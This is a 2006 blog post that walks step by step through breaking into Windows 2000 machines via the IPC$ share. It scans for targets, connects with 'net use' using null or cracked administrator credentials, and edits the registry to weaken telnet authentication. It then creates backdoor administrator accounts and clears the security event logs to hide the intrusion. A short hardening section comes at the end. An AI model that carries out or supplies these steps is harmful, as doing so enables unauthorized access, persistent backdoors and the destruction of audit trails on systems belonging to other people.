To Be or Not To Be!!!

Just another Wordpress.com weblog

Hacking a W2K through IPS$

1: Scanning for open Win2k systems
2: Connecting to the IPC$
3: Connecting and using Computer Management.
4. Disable NTLM
5: Starting the Telnet service
6: Creating user accounts and adding them to a group
7: Covering your tracks
8: How to protect your Win2k system from this attack

—————————————————————————————————–
You need to be running a Windows system:

Superscan version by Foundstone
NetBrute Scanner
PQWak

(and, of course, so many other tools can do that!!!)😉
—————————————————————————————————-
 
 
1: Scanning for open Win2k systems
A. Open SuperScan (Port scanner)
B. Select a IP range
C. Check "Only scan responsive pings" and "All selected ports in list"
D. Only scan ports 139 (NetBIOS), and 1025 (Network Blackjack)
E. When a system with both Netbios and BlackJack is found, open NetBrute, and scan that IP to see if there is an IPC$
 
2: Connecting to the IPC$
A. Open a DOS window
B. Type in " net use \\ipaddress\ipc$ "" /user:administrator "
C. If you connect to the system, it will say, " The command was completed successfully "
D. If it says, Bad username or password? Try running PQWak.exe to crack the share name password. Then insert the password like so:
net use \\ipaddress\ipc$ "password" /user:administrator
E. Users usually have only one password for everything. So try the c$ share pass as the administrator password to connect to the IPC$
 
3: Connecting using Computer Management
A. Open Computer Management.
B. Click Action then Connect to Another Computer. Type in the IP address.
 
4. Disable NTLM
A. Open Regedit. Connect to the following registry key:
HKEY_LOCAL_MACHINE–Software–Microsoft–Telnet Server–1.0?>NTLM
C. Set the value data from (2) to (1)
D. That will enable login to the telnet server without being connected to the IPC$ or a trusted domain.
 
5. Starting the Telnet service
A. In Computer Management, click Services and Applications. Click Services
C. Right click on the Telnet Service and open Properties.
D. Set the service to Automatic, and start the service.
 
6: Creating user accounts and adding them to a group
A. Open a dos window, and type the following: telnet IPaddress
B. If prompted to type a username and password, type Administrator with no password.
C. To create a user account, type the following: Net user username password /add
D. Replace Username? and Password? with whatever you like.
E. To add a user account to a domain, type the following: Net localgroup administrators username /add Or Net group administrators username /add
 
7: Covering your tracks
A. Open a dos window, and type the following: Net use \\ipaddress\ipc$ /delete
B. While logged on to Computer Management. Check if the Security Logs are being audited in Event Viewer. If they are, clear them.🙂
 
8: How to protect your Win2k system from this attack
A. Open Regedit
B. Connect to the following:
C. HKEY_LOCAL_MACHINE–System–CurrentControlSet–Control–Lsa–>restrictanonymous
D. Change the "Value Data" from 0 to 1. It should say 0x00000001(1)
E. That will disable remote logon to a null IPC$
F. Always have a complicated administrator password with Windows2000 or any other OS
G. Install a firewall.

BLACK ANGEL

Tháng Sáu 19, 2006 - Posted by | Security Exploits

Chưa có phản hồi.

Gửi phản hồi

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s

%d bloggers like this: